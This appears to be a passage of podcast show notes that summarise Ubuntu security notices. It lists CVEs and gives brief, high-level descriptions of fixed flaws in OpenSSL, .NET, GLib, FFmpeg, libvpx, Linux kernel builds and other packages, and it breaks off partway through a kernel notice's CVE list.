<h3 id="usn-6437-1-vips-vulnerabilities--00-35">[<a href="https://ubuntu.com/security/notices/USN-6437-1">USN-6437-1</a>] VIPS vulnerabilities (00:35)</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-40032">CVE-2023-40032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27847">CVE-2021-27847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-20739">CVE-2020-20739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6976">CVE-2019-6976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7998">CVE-2018-7998</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Image processing library / CLI tool</li>
<li>NULL ptr derefs + divide by zero -&gt; crash -&gt; DoS</li>
<li>info leak since would fail to clear memory and leak this in the generated image</li>
</ul>
<h3 id="usn-6435-1-openssl-vulnerabilities--01-26">[<a href="https://ubuntu.com/security/notices/USN-6435-1">USN-6435-1</a>] OpenSSL vulnerabilities (01:26)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3817">CVE-2023-3817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3446">CVE-2023-3446</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CPU-based DoS via an execssively large DH modulus (<code>p</code> parameter) value (over 10,000 bits)</li>
<li>OpenSSL by default will try and validate if the modulus over 10,000 bits and
raise an error - but before the error is raised it would still check other
aspects of the supplied key / parameters which in turn could use the <code>p</code> value
and hence take an excessive amount of time - fixed by checking this earlier
and erroring out in that case</li>
<li>Then was found that the <code>q</code> parameter could also be abused in the same way -
since the size of this has to be less than <code>p</code> was fixed by just checking it
against this</li>
</ul>
<h3 id="usn-6450-1-openssl-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6450-1">USN-6450-1</a>] OpenSSL vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3817">CVE-2023-3817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3446">CVE-2023-3446</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2975">CVE-2023-2975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5363">CVE-2023-5363</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Two CPU-based DoS issues above plus
<ul>
<li>Possible truncation / overrun during the initialisation of various ciphers if
the key or IV lengths differ compared to when initially established - some
ciphers allow a variable length IV (e.g. AES-GCM) and so it is possible that
an application will use a non-standard IV length during the use of the cipher
compared to when they initialise it
<ul>
<li>The API for this was only &ldquo;recently&rdquo; introduced (3.x) - and in general not a
lot of applications will be affected</li>
</ul>
</li>
<li>Issue specific to the AES-SIV (mode of AES that provides deterministic
nonce-less key wrapping - used for key wrapping when transporting
cryptographic keys; as well as nonce-based authenticated encryption that is
resistant to nonce reuse)
<ul>
<li>AES-SIV allows to perform authentication of data - and to do this the
relevant OpenSSL API&rsquo;s should be called with an input buffer length of 0
and a NULL ptr for the output buffer - BUT if the associated data to be
authenticated was empty, in this case, OpenSSL would return success
without doing any authentication</li>
<li>In practice this is unlikely to be an issue since it doesn&rsquo;t not affect
non-empty data authentication which is the vast majority of use-cases</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-6165-2-glib-vulnerabilities--07-57">[<a href="https://ubuntu.com/security/notices/USN-6165-2">USN-6165-2</a>] GLib vulnerabilities (07:57)</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32665">CVE-2023-32665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32643">CVE-2023-32643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32636">CVE-2023-32636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32611">CVE-2023-32611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29499">CVE-2023-29499</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-199/#usn-6165-1-glib-vulnerabilities--11-07">[USN-6165-1] GLib vulnerabilities from Episode 199</a></li>
</ul>
<h3 id="usn-6374-2-mutt-vulnerabilities--05-08">[<a href="https://ubuntu.com/security/notices/USN-6374-2">USN-6374-2</a>] Mutt vulnerabilities (05:08)</h3>
<ul>
<li>2 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4875">CVE-2023-4875</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4874">CVE-2023-4874</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-210/#usn-6374-1-mutt-vulnerabilities--07-16">[USN-6374-1] Mutt vulnerabilities from Episode 210</a></li>
</ul>
<h3 id="usn-6438-1-usn-6438-2-usn-6427-2-dot-net-vulnerabilities--05-15">[<a href="https://ubuntu.com/security/notices/USN-6438-1">USN-6438-1</a>, <a href="https://ubuntu.com/security/notices/USN-6438-2">USN-6438-2</a>, <a href="https://ubuntu.com/security/notices/USN-6427-2">USN-6427-2</a>] .NET vulnerabilities (05:15)</h3>
<ul>
<li>2 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-44487">CVE-2023-44487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-36799">CVE-2023-36799</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP/2 Rapid Reset - DoS on server side by clients sending a large number of
requests and immediately cancelling them many times over and over - exploited
in the wild recently, achieving the largest DoS attack bandwidths seen -
requires HTTP/2 implementations to essentially do heuristics over time to
track allocated streams against connections and block the connection when too
many are made or similar
<ul>
<li>Fix for Kestrel web server in .NET</li>
</ul>
</li>
</ul>
<h3 id="usn-6362-2-dot-net-regressions">[<a href="https://ubuntu.com/security/notices/USN-6362-2">USN-6362-2</a>] .Net regressions</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-36799">CVE-2023-36799</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-209/#usn-6362-1-dot-net-vulnerability--06-46">[USN-6362-1] .NET vulnerability from Episode 209</a></li>
<li>Fix for DoS in handling of X.509 certificates</li>
</ul>
<h3 id="usn-6199-2-php-vulnerability--06-31">[<a href="https://ubuntu.com/security/notices/USN-6199-2">USN-6199-2</a>] PHP vulnerability (06:31)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3247">CVE-2023-3247</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-202/#usn-6199-1-php-vulnerability--10-35">[USN-6199-1] PHP vulnerability from Episode 202</a></li>
</ul>
<h3 id="usn-6403-2-libvpx-vulnerabilities--06-39">[<a href="https://ubuntu.com/security/notices/USN-6403-2">USN-6403-2</a>] libvpx vulnerabilities (06:39)</h3>
<ul>
<li>2 CVEs addressed in Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5217">CVE-2023-5217</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-44488">CVE-2023-44488</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>WebM VP8/VP9 video en/decoder</li>
<li>Heap buffer overflow -&gt; DoS/RCE</li>
<li>OOB read -&gt; DoS</li>
</ul>
<h3 id="usn-6408-2-libxpm-vulnerabilities--07-00">[<a href="https://ubuntu.com/security/notices/USN-6408-2">USN-6408-2</a>] libXpm vulnerabilities (07:00)</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-43789">CVE-2023-43789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-43788">CVE-2023-43788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-43787">CVE-2023-43787</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-43786">CVE-2023-43786</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Infinite recursion -&gt; stack exhaustion -&gt; crash -&gt; DoS</li>
<li>Integer overflow -&gt; heap buffer overflow -&gt; RCE/DoS</li>
<li>Two different OOB reads -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-6448-1-sofia-sip-vulnerability--09-01">[<a href="https://ubuntu.com/security/notices/USN-6448-1">USN-6448-1</a>] Sofia-SIP vulnerability (09:01)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32307">CVE-2023-32307</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SIP user agent - integer overflows and resulting heap buffer overflows due to
missing length checks in the STUN message parser -&gt; RCE</li>
<li>Also fixed a OOB read as well -&gt; DoS</li>
</ul>
<h3 id="usn-6422-2-ring-vulnerabilities--09-17">[<a href="https://ubuntu.com/security/notices/USN-6422-2">USN-6422-2</a>] Ring vulnerabilities (09:17)</h3>
<ul>
<li>20 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21722">CVE-2022-21722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39244">CVE-2022-39244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31031">CVE-2022-31031</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24793">CVE-2022-24793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24764">CVE-2022-24764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24763">CVE-2022-24763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24754">CVE-2022-24754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23608">CVE-2022-23608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23547">CVE-2022-23547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23537">CVE-2022-23537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21723">CVE-2022-21723</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43845">CVE-2021-43845</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43804">CVE-2021-43804</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43303">CVE-2021-43303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43302">CVE-2021-43302</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43301">CVE-2021-43301</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43300">CVE-2021-43300</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43299">CVE-2021-43299</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27585">CVE-2023-27585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37706">CVE-2021-37706</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Voice / video and chat platform (now called Jami, contains embedded copy of
PJSIP - library implementing various related protocols for remote
communication like SIP, STUN, RTP, ICE and others)</li>
<li>Also missed various length checks, allowing possible integer underflow -&gt; crash / memory corruption -&gt; RCE</li>
<li>Buffer overflow when using the internal DNS resolver</li>
</ul>
<h3 id="usn-6449-1-ffmpeg-vulnerabilities--09-58">[<a href="https://ubuntu.com/security/notices/USN-6449-1">USN-6449-1</a>] FFmpeg vulnerabilities (09:58)</h3>
<ul>
<li>8 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48434">CVE-2022-48434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38094">CVE-2021-38094</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38093">CVE-2021-38093</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38092">CVE-2021-38092</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38091">CVE-2021-38091</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38090">CVE-2021-38090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-20898">CVE-2020-20898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22038">CVE-2020-22038</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory leaks -&gt; DoS, plus some integer overflows -&gt; buffer overflows
in various parsers for different media types</li>
</ul>
<h3 id="usn-6447-1-aom-vulnerabilities--11-32">[<a href="https://ubuntu.com/security/notices/USN-6447-1">USN-6447-1</a>] AOM vulnerabilities (11:32)</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30475">CVE-2021-30475</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30474">CVE-2021-30474</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30473">CVE-2021-30473</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36135">CVE-2020-36135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36133">CVE-2020-36133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36131">CVE-2020-36131</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36130">CVE-2020-36130</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>AV1 Video Codec Library - used by things like gstreamer, libavcodec - in turn
is used by a huge number of multimedia applications from blender, ffmpeg,
kodi, mplayer, obs-studio, vlc and more
<ul>
<li>Very much a case of <a href="https://xkcd.com/2347/">xkcd 2347 (Dependency)</a></li>
</ul>
</li>
<li>Various buffer overflows, use-after-frees, stack buffer overflow, NULL ptr
derefs etc.</li>
</ul>
<h3 id="usn-6288-2-mysql-vulnerability--12-40">[<a href="https://ubuntu.com/security/notices/USN-6288-2">USN-6288-2</a>] MySQL vulnerability (12:40)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-22053">CVE-2023-22053</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-205/#usn-6288-1-mysql-vulnerabilities">[USN-6288-1] MySQL vulnerabilities from Episode 205</a></li>
</ul>
<h3 id="usn-6451-1-ncurses-vulnerability--12-47">[<a href="https://ubuntu.com/security/notices/USN-6451-1">USN-6451-1</a>] ncurses vulnerability (12:47)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-19189">CVE-2020-19189</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow via crafted terminfo file - found by fuzzing <code>infotocap</code>
<ul>
<li>terminfo files are usually trusted content so unlikely to be an issue in
practice</li>
</ul>
</li>
</ul>
<h3 id="usn-6416-3-linux-kernel--raspberry-pi--vulnerabilities--14-00">[<a href="https://ubuntu.com/security/notices/USN-6416-3">USN-6416-3</a>] Linux kernel (Raspberry Pi) vulnerabilities (14:00)</h3>
<ul>
<li>13 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-44466">CVE-2023-44466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4273">CVE-2023-4273</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4194">CVE-2023-4194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4155">CVE-2023-4155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4132">CVE-2023-4132</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3866">CVE-2023-3866</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3865">CVE-2023-3865</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3863">CVE-2023-3863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38432">CVE-2023-38432</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3338">CVE-2023-3338</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2156">CVE-2023-2156</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20569">CVE-2023-20569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1206">CVE-2023-1206</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 raspi for 22.04 LTS</li>
<li>Most interesting vuln fixed is AMD &ldquo;INCEPTION&rdquo; - <a href="/episode-207/#usn-6319-1-amd-microcode-vulnerability--10-33">[USN-6319-1] AMD Microcode
vulnerability from Episode 207</a> - speculative execution attack similar to the
original Spectre</li>
<li>Have now added a mitigation within the kernel itself rather than having to
rely on CPU microcode (particularly when that microcode only covers a subset
of the affected CPUs)</li>
</ul>
<h3 id="usn-6439-1-usn-6439-2-linux-kernel-vulnerabilities--15-09">[<a href="https://ubuntu.com/security/notices/USN-6439-1">USN-6439-1</a>, <a href="https://ubuntu.com/security/notices/USN-6439-2">USN-6439-2</a>] Linux kernel vulnerabilities (15:09)</h3>
<ul>
<li>11 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4921">CVE-2023-4921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4881">CVE-2023-4881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4623">CVE-2023-4623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4622">CVE-2023-4622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42755">CVE-2023-42755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42753">CVE-2023-42753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42752">CVE-2023-42752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3772">CVE-2023-3772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34319">CVE-2023-34319</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31083">CVE-2023-31083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1206">CVE-2023-1206</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 generic,low-latency,kvm,aws etc</li>
<li>includes various high priority fixes which we&rsquo;ve covered in previous episodes</li>
</ul>
<h3 id="usn-6440-1-usn-6440-2-linux-kernel-vulnerabilities--15-40">[<a href="https://ubuntu.com/security/notices/USN-6440-1">USN-6440-1</a>, <a href="https://ubuntu.com/security/notices/USN-6440-2">USN-6440-2</a>] Linux kernel vulnerabilities (15:40)</h3>
<ul>
<li>12 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4921">CVE-2023-4921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4881">CVE-2023-4881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4623">CVE-2023-4623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4622">CVE-2023-4622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42755">CVE-2023-42755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42753">CVE-2023-42753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42752">CVE-2023-42752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3772">CVE-2023-3772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34319">CVE-2023-34319</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31083">CVE-2023-31083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1206">CVE-2023-1206</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0597">CVE-2023-0597</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15
<ul>
<li>kvm, gcp, aws, azure, generic, lowlatency on 18.04 / 16.04 HWE</li>
<li>azure 14.04</li>
</ul>
</li>
<li>same as above</li>
</ul>
<h3 id="usn-6441-1-usn-6441-2-linux-kernel-vulnerabilities--15-50">[<a href="https://ubuntu.com/security/notices/USN-6441-1">USN-6441-1</a>, <a href="https://ubuntu.com/security/notices/USN-6441-2">USN-6441-2</a>] Linux kernel vulnerabilities (15:50)</h3>
<ul>
<li>9 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4921">CVE-2023-4921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4881">CVE-2023-4881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4623">CVE-2023-4623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4622">CVE-2023-4622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42756">CVE-2023-42756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42755">CVE-2023-42755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42753">CVE-2023-42753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42752">CVE-2023-42752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34319">CVE-2023-34319</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 xilinx zyncmp, ibm, gkeop, kvm, oracle, aws, gcp, azure, generic, lowlatency</li>
</ul>
<h3 id="usn-6442-1-linux-kernel--bluefield--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6442-1">USN-6442-1</a>] Linux kernel (BlueField) vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4921">CVE-2023-4921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4881">CVE-2023-4881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4623">CVE-2023-4623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4622">CVE-2023-4622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42756">CVE-2023-42756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42755">CVE-2023-42755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42753">CVE-2023-42753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42752">CVE-2023-42752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34319">CVE-2023-34319</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 bluefiled (same as above)</li>
</ul>
<h3 id="usn-6443-1-linux-kernel--oem--vulnerabilities--15-55">[<a href="https://ubuntu.com/security/notices/USN-6443-1">USN-6443-1</a>] Linux kernel (OEM) vulnerabilities (15:55)</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5197">CVE-2023-5197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4881">CVE-2023-4881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42756">CVE-2023-42756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42755">CVE-2023-42755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42752">CVE-2023-42752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4244">CVE-2023-4244</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.1 oem</li>
</ul>
<h3 id="usn-6444-1-usn-6444-2-linux-kernel-vulnerabilities--16-46">[<a href="https://ubuntu.com/security/notices/USN-6444-1">USN-6444-1</a>, <a href="https://ubuntu.com/security/notices/USN-6444-2">USN-6444-2</a>] Linux kernel vulnerabilities (16:46)</h3>
<ul>
<li>11 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5197">CVE-2023-5197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4921">CVE-2023-4921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4881">CVE-2023-4881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4623">CVE-2023-4623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4622">CVE-2023-4622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42756">CVE-2023-42756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42755">CVE-2023-42755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42753">CVE-2023-42753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42752">CVE-2023-42752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4244">CVE-2023-4244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34319">CVE-2023-34319</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.2 starfive, aws, oracle, azure, kvm, lowlatency, raspi, gcp, generic for 23.04</li>
</ul>
<h3 id="usn-6445-1-usn-6445-2-linux-kernel--intel-iotg--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6445-1">USN-6445-1</a>, <a href="https://ubuntu.com/security/notices/USN-6445-2">USN-6445-2</a>] Linux kernel (Intel IoTG) vulnerabilities</h3>
<ul>
<li>24 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5197">CVE-2023-5197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4921">CVE-2023-4921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4881">CVE-2023-4881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4623">CVE-2023-4623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4622">CVE-2023-4622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-44466">CVE-2023-44466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42756">CVE-2023-42756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42755">CVE-2023-42755</a> <!-- raw HTML omitted --></li>
